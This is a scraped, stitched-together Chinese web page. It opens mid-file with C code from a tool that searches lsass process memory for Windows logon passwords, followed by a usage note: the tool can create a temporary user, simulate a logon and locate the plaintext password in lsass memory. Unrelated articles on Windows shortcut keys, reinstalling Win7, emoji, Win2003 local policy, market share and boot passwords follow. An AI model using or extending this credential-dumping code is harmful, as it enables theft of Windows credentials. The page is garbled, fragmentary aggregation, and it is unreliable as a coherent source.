CloseHandle(hProcess);Found = Search(Buffer，ByteGet); // Search The Password if (Found >= 0) // We May Find The Password {if (strlen(Password) >0) // Yes，We Find The Password Even We Dont Know If The Password Is Correct Or Not{printf("Found Password At #0x%x ->"%s"n"，Found + BaseAddress，Password);} } else {printf("Fail To Find The Passwordn"); } return TRUE; } // End FindPassword

//------------------------------------------------------------------------------------ // Purpose: Check If The Box Is Windows 2003 // Return Type: BOOLEAN // Parameters: None //------------------------------------------------------------------------------------ BOOL Is2003() { OSVERSIONINFOEX osvi; BOOL b0sVersionInfoEx; ZeroMemory(&osvi，sizeof(OSVERSIONINFOEX)); osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX);

if (!(b0sVersionInfoEx=GetVersionEx((OSVERSIONINFO *)&osvi))) {osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO); } return (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2); } // End Is2003() // End Of File

附件程序相当于密码定位程序，用来测试在lsass内存中搜索指定的字符串或模拟登陆的密码.

用法:

1.locator 字符串 ->在lsass进程内存中搜索指定的那个"字符串"，返回确定的位置

2.Locator 用户名 密码 ->在系统中建立一个参数指定的用户，并进行模拟登陆，然后搜索"密码"在lsass进程内存中的位置，生成的帐户程序运行完后会自动删除。

在win10系统中经常经常需要使用一些快捷键快速打开某些设置，如在Win10系统中由于开始运行命令很难找到，不过通过Win+R组合快捷键即可快速打开运行命令框，另外还有比如在Win10系统中最快打开控制面板的方法是按 Win+i 组合键。不多很多电脑小白都不清楚windows键是哪个，下面就来简单的介绍一下。

关于Windows键是哪个的问题，这里上面所知的Win键其实就是键盘上的Windows键，这个按键上有一个微软Windows图标，并没有直接标有Win字样，这也是众多菜鸟朋友找不到Win键的原因所在。理解了这个，那么找到Win键就相当容易了，不管是笔记本键盘还是台式电脑键盘，Win8键是必不可少的，该键属于辅助按键，主要与其它按键组合使用，实现一些特定的功能，尤其是在Win7与Win8系统中，Win键的作用很大，熟悉Win键的用途可以大大加快我们的工作效率。

Win键是键盘上哪个键?

Win键处于电脑键盘的左下角，处于Ctrl键与Alt键中间的那个带着微软的徽标的键就就是Win键，如下键盘图指所示：

配合Win键可以和其他按键组合成多种快捷操作方式，比如Win+1可以打开任务栏左下角第一个应用，Win+R可以打开运行符，Win+Q可以打开微软小娜Cortana。

Windows键是哪个的介绍就到这里，对于Win键的作用了解的朋友并不多，尤其是在XP系统很多朋友其实都把其当做了摆设，随着Win7与Win8系统对电脑效率的不断优化，Win键的作用也越来越大，比如快速打开运行命令框等等实用Win键组合键则非常方便快捷。

win10系统一经推出，就受到大众的追捧，纷纷寻求方法将自己的电脑系统换成自己的电脑系统win10，但是很多人用了一段时间，却发现还是原配好，想换成新的win7系统。幸运的是，重新安装系统不需要钱，否则你会损失很多。这里有一个将与您分享的系统。win10系统重装为win7系统方法，不要太感谢小编哦。

怎样将win10系统变回win7系统

1.想要备份电脑内的重要信息，打开网页搜索引擎搜索小鱼系统官网，在官网下载小鱼一键重装系统软件。

2、关闭杀毒软件，打开小鱼一键重装系统，小鱼会先检测计算机环境。

3、计算机环境检测完成后，进入如图界面，选择我们需要安装的，win7系统，点击安装此系统下一步。

4，选择win7系统中的装机软件，可根据自身需要进行选择。

5、上述步骤完成后，小鱼执行win7系统镜像下载，win7系统镜像下载后，电脑会自动重启执行系统安装。

6、等待电脑进入win7系统桌面，重装完成。

其实win10系统也有很多优点，而且比较一下win7系统推出时间较晚，很多地方都与时俱进，但是win7系统流行多年，不能一蹴而就。让我们看看哪个系统更适合我们的电脑。

表情小儿科最近宣布了一系列win10拥有的新表情设计，包括“中指”。更甜蜜的是，根据肤色，这个动作有6种选择(这是当然的，否则你会被骂死)。

当然，中指表情符号是在2014年中期推出的，但它被安卓、视窗和iOS操作系统集体屏蔽，直到这一次被Win 10首次接受。

值得一提(涂)和称赞(曹)的另一点是，Win 10特别优化了中国麻将的“红色中间”模式，使其看起来更像一个真正的麻将牌:

我真的要感谢微软对中国文化的特殊对待...

你觉得这些东西怎么样？请随意在评论区吐痰！

如何设置win2003的本地策略

本文介绍了如何在工作组设置中基于Windows Server 2003 的计算机上将本地策略应用于除管理员以外的所有用户

在工作组设置（而非域）中使用基于Windows Server 2003 的计算机时，可能需要在该计算机上实施本地策略，这些策略可应用于该计算机的所有用户，但不可应用于管理员。有了这一例外，管理员可以保留对计算机的无限制访问权和控制权，并且还可以限制可登录该计算机的用户。

将本地策略应用于除管理员以外的所有用户

要对除管理员以外的所有用户实施本地策略，请执行以下步骤：

以管理员身份登录到计算机。

打开本地安全策略。要实现这一点，请执行以下操作：

单击开始运行，键入gpedit.msc，然后按ENTER 键。

或者单击开始运行，键入mmc，按ENTER键，添加“组策略对象编辑器”，然后为本地安全策略对其进行配置。

如果删除运行命令是您所需要的策略之一，Microsoft 建议您通过“Microsoft 管理控制台”(MMC) 编辑该策略，然后将结果保存为图标。这样，您不需要使用运行命令就可以重新打开该策略了。

展开用户配置对象，然后展开管理模板对象。 启用您所需的任何策略（例如，“隐藏桌面上的‘网上邻居’”或“隐藏桌面上的Internet Explorer 图标”）。

备注：一定要选择正确的策略，否则，您可能会限制管理员登录计算机（以及完成配置计算机所需步骤）的能力。Microsoft 建议您记录所做的任何更改。

关闭“Gpedit.msc 组策略”管理单元，或者，如果您使用 MMC，请将控制台保存为图标，以便以后可以访问它，然后从计算机注销。

以管理员身份登录到计算机。

您可以在此登录会话中验证以前所做的策略更改，因为在默认情况下，本地策略会应用于包括管理员在内的所有用户。

从计算机注销，然后以此计算机所有其他用户（您希望他们应用这些策略）的身份登录到计算机。这些策略是为所有这些用户和管理员而实现的。

备注：对于在这一步未登录到计算机的任何用户帐户，都无法为其实现这些策略。

以管理员身份登录到计算机。

单击开始，指向控制面板，然后单击文件夹选项。选择查看选项卡，选中“显示隐藏文件或文件夹”，然后点确定以便可以查看“组策略”隐藏文件夹。或者，打开“Windows 资源管理器”，单击工具，然后单击文件夹选项以查看这些设置。

将位于 %Systemroot%System32GroupPolicyUser 文件夹中的 Registry.pol 文件复制到备份位置（例如，复制到另一硬盘、软盘或文件夹）。

使用“Gpedit.msc 组策略”管理单元或您的 MMC 图标再次打开本地策略，然后启用在为该计算机创建的原始策略中禁用的实际功能。

备注：执行此操作时，“策略编辑器”会创建一个新的 Registry.pol 文件。

关闭策略编辑器，然后将创建的备份 Registry.pol 文件复制回%Systemroot%System32GroupPolicyUser 文件夹中。

系统提示替换现有文件时，单击是。

从计算机注销，然后以管理员身份登录。

由于您是以管理员身份登录到计算机，您可以验证是否没有实施最初所做的更改。从计算机注销，然后以其他用户身份登录。

由于您是以用户（而非管理员）身份登录到计算机，您可以验证是否实施了最初所做的更改。

以管理员身份登录计算机，以确认本地策略不影响您以本地管理员身份登录该计算机。

恢复原始本地策略

要撤消本文中“将本地策略应用于除管理员以外的所有用户”一节介绍的过程，请执行以下步骤：

以管理员身份登录到计算机。

单击开始，指向控制面板，然后单击文件夹选项。单击查看 选项卡，单击“显示隐藏文件和文件夹”，然后单击确定 以便可以查看“组策略”隐藏文件夹。或者，打开“Windows 资源管理器”，单击工具，然后单击文件夹选项。

从 %Systemroot%System32GroupPolicyUser 文件夹中移动、重命名或删除Registry.pol 文件。

在您从计算机注销或重新启动计算机后，“Windows 文件保护”系统会创建另一个默认的 Registry.pol 文件。

打开本地策略。要实现这一点，请单击开始运行，然后键入gpedit.msc。或者，单击开始运行，键入mmc，加载本地安全策略。然后，将设为禁用或启用的所有项目设为未配置，以撤消 Registry.pol 文件所指定的对 Windows Server2003 注册表实施的任何策略更改。

以管理员身份从计算机注销，然后再次以管理员身份登录该计算机。

从计算机注销，然后以本地计算机的所有用户身份登录到该计算机，这样也可以针对它们的帐户撤消更改。

有用户在使用win10 9926时发现，局域网中 win7共享文件不能访问。用户很郁闷：难道是 系统 不同导致，还是其他原因?如何处理?

其实此问题 启用 管理员 账户 就可以了。

一般我们使用 Win10 ，都是用用户账户，而不是管理员账户。管理员账户拥有系统的 最 高权限，可以任意修改各项设置，但是这样很容易打乱系统的正常秩序。而用户账户除了不能修改系统设置外，系统文件和管理员设置的隐藏文件都是无法看到。如本文这样，无法访问 win 7的共享文件，只有启用管理员账户才有权限访问。 win10 的管理员账户默认下是禁用的，需要用户手动关闭禁用。

另外， win1 0 10041已经不存在用户账户无法访问局域网Win7共享文件的问题了，用户可以升级来体验。

目前，在全球，作为一家专注开发一系列电脑（桌面）操作系统而扬名的微软，正在竭力向全球数以万计用户推荐自己的最新款电脑操作系统——win10。事实是，全球仍有相当多用户对包括Windows XP，Win 7和Win 8（8.1）三款电脑操作系统“依依不舍”，“恋恋不忘”。比如说，在中国，一些用户就是认为“Win 7比Win 10更好”。个别用户在网上留言：“微软太霸道，非要逼着我们在自己电脑中安装Windows 10。”

Win 10正式问世于2015年。微软曾经为自己定下了一个目标，即在2017年财年，全球大约10亿用户的电脑中安装的是Win 10。然而，截至2017年2月，全球仅有4亿左右用户的电脑中安装了Win 10。这个数字显然和微软曾经定下的那个目标数字差了太多太多。微软是不止一次地，借助一系列公开渠道来“劝”全球许许多多用户在自己电脑中赶紧地安装Win 10，奈何全球这般多用户不肯听微软的“劝”。

全球知名的数据研究公司NetMarketShare统计：2017年1月到2月，在全球市场中，Win 10的市场份额略有下降，由25.3%下降至25.2%，Win 8.1的市场份额基本没有变化，Win 7的市场份额从47.2%上升至48.4%，Windows XP的市场份额从9.2%下降至8.5%。看起来，Win 7才是全球一半以上用户的“最爱”？

前不久，美国一些媒体纷纷报道：微软有了一个新的打算。通俗来说，在全球，凡是不愿意在自己电脑中安装上Win 10的用户，恐怕得像Windows XP和Windows Vista那样被微软抛弃了。对此，微软发言人找到了回应媒体的理由：“新一代处理器出来之后，它们需要的是获得最新款Windows平台的支持。这样一来，我们可以把更多时间和精力用来深度整合Windows平台和新一代处理器，进而保证最大程度的可靠性和向后兼容性。”微软决定，2020年，Win 7的支持服务停止。2023年，Win 8（8.1）的支持服务停止。

最后，不妨看看两位中国用户各自在网上留下的评论。

用户A：我对微软有些不满，微软凭什么要把Windows Update和最新处理器捆绑起来。微软强逼用户升级Windows 10，如同是在绑架用户一般。未来，微软肯定会继续升级Windows。如果微软在未来版本Windows中增加一些用户不喜欢的东西，用户想重新换用旧版本Windows的机会很可能也没有了。

用户B：微软这样做的一个重要目的，不外乎是让尽可能多的用户升级到Win 10。我能理解。不过，Win 10本来就有许多问题。比如，用户使用数据流量上网时，Win 10同样在电脑后台启动自动升级功能。微软利用Windows（遥测功能）来全程监视用户在电脑上的操作过程，并将用户的操作过程以数据形式发送至微软。

现在很多人都在用电脑，所以今天就给大家讲讲如何设置电脑开机密码。

材料/工具

电脑

xp

首先打开控制面板。

然后点击用户账号。

然后点击计算管理员。

然后点击创建密码。

然后输入密码并点击创建密码。

win7

首先打开控制面板。

然后选择用户账户和家庭安全。

然后单击为您的帐户创建密码。

最后，输入密码完成。